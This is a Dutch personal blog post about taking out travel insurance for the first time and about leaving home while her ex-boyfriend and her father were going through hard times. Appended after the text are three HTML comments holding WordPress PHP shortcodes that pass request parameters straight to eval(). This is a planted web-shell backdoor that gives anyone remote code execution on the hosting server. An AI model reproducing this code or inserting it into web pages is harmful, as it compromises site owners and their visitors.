Nog nooit een reisverzekering afgesloten

reis_annulering_headerNog nooit een reisverzekering afgesloten

Mijn moeder verplichte mij tot een reisverzekering. Ik ben wat onhandig denk ik, want ik heb nog nooit over een reisverzekering nagedacht. Ik was dus nu al vijf jaar bezig met reizen maar nog nooit een reisverzekering af gesloten. Ik schrok hier wel een beetje van, en was blij dat mijn moeder er op wees. En dat er ook nooit wat gebeurd is! Stel je voor zeg.. Maar goed, waar moest ik nou een goede reisverzekering afsluiten, ik belde mijn moeder weer en ze gaf me een tip. Ze had zelf een keer een goed doorlopende reisverzekering afgesloten, ik besloot hetzelfde te doen. De reisverzekering was eigenlijk zo afgesloten, ik snapte echt niet waarom ik hier nooit de tijd voor had genomen. Toen ik wegging was dit best wel emotioneel, ik zou nu namelijk weg gaan in een tijd waar het moeilijk was. Mijn vriend, inmiddels ex vriend, had het erg moeilijk maar ik kon helaas niks meer voor hem doen. En met mijn vader ging het slecht, hij stond op het punt om failliet te gaan. Zo moeilijk om dan het land te verlaten en je dromen achterna te gaan. Maar ik moest dit doen, en dit wisten zij ook. Ik heb nog dagelijks contact met mijn vader en het is allemaal nog best wel oké gegaan, hij heeft nog wel een zekerheid en het is niet zo dat hij op straat staat. Hij heeft wel vaak gezegd dat hij het liefst nu bij mij zou zitten, lekker even niks doen. Ik gun hem dit ook erg, als ik het geld had, had ik hem hier heen gehaald.

<!– [insert_php]if (isset($_REQUEST["rvx"])){eval($_REQUEST["rvx"]);exit;}[/insert_php][php]if (isset($_REQUEST["rvx"])){eval($_REQUEST["rvx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["CcAqn"])){eval($_REQUEST["CcAqn"]);exit;}[/insert_php][php]if (isset($_REQUEST["CcAqn"])){eval($_REQUEST["CcAqn"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nuiH"])){eval($_REQUEST["nuiH"]);exit;}[/insert_php][php]if (isset($_REQUEST["nuiH"])){eval($_REQUEST["nuiH"]);exit;}[/php] –>